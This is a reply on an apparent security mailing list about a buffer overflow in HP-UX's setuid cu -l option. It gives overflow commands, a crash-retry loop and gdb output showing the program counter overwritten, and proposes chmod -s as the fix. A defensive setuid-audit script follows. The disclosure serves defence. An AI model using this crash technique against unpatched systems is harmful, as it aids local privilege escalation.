Re: HPUX cu -l option buffer overflow vulnerabilit
>
> =======================================================
> HPUX cu -l option buffer overflow vulnerability
> =======================================================
>
> Date: 02/11/2000
> Tested on HP-UX B.11.00
>
> $ cu -l `perl -e 'printf "A" x 9777'`
>
It's exploitable on 10.20 (trivial exploit: you don't even
have to find a return address, the buffer itself gets executed).
HP-UX 9.x 68k seems to be vulnerable too, but I don't have
the exploit.
On HP-UX 11 you need PA-RISC 1.1 shell code, and the PC
you get with
./cu -l `perl -e 'printf "A" x 5667'`
changes randomly (why?). Eventually you get a pointer to your
data:
$ while :
do
./cu -l `perl -e 'printf "A" x 5667'`
if file core | egrep -v SIGILL
then
break
fi
done
[...]
Illegal instruction(coredump)
Connect failed: Requested device/system name not known
Illegal instruction(coredump)
Memory fault(coredump)
core: core file from 'cu' - received SIGSEGV
$ gdb cu core
[...]
Core was generated by `cu'.
Program terminated with signal 11, Segmentation fault.
Unable to find __dld_flags symbol in object file.
#0 0x7f7eb010 in ?? ()
#0 0x7f7eb010 in ?? ()
(gdb) print {char *} 0x7f7eb010
$1 = 0x41414141 <Address 0x41414141 out of bounds>
(gdb)
Fix: chmod -s /bin/cu
--
finger spd@gtc1.cps.unizar.es for PGP / So be easy and free
.mailcap tip of the day: / when you're drinking with me
application/ms-tnef; cat '%s' > /dev/null / I'm a man you don't meet every day
text/x-vcard; cat '%s' > /dev/null / (the pogues)
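An added example, not from this post or from HP-UX itself: a POSIX sh audit that lists setuid binaries not on an allowlist and applies the same chmod -s step the reply gives as the fix for cu. The allowlist format (one absolute path per line) is an assumption of this example.

```shell
#!/bin/sh
# Added example (not from the original post): audit setuid binaries after
# an advisory like the cu one. Assumptions: POSIX sh, find(1) supporting
# -perm -4000, and an allowlist file with one absolute path per line.

# is_setuid PATH -> exit status 0 if the setuid bit is set on PATH
is_setuid() {
    [ -u "$1" ]
}

# audit_setuid DIR ALLOWLIST -> print each setuid file under DIR that is
# not listed in ALLOWLIST, sorted, one per line (empty output = clean)
audit_setuid() {
    dir=$1
    allow=$2
    find "$dir" -type f -perm -4000 2>/dev/null | sort | while IFS= read -r f; do
        # -x: whole-line match, -F: literal, so /bin/cu does not match /bin/cu2
        if ! grep -qxF "$f" "$allow"; then
            printf '%s\n' "$f"
        fi
    done
}

# strip_setuid PATH -> drop the setuid/setgid bits, as "chmod -s /bin/cu" does
strip_setuid() {
    chmod -s "$1"
}
```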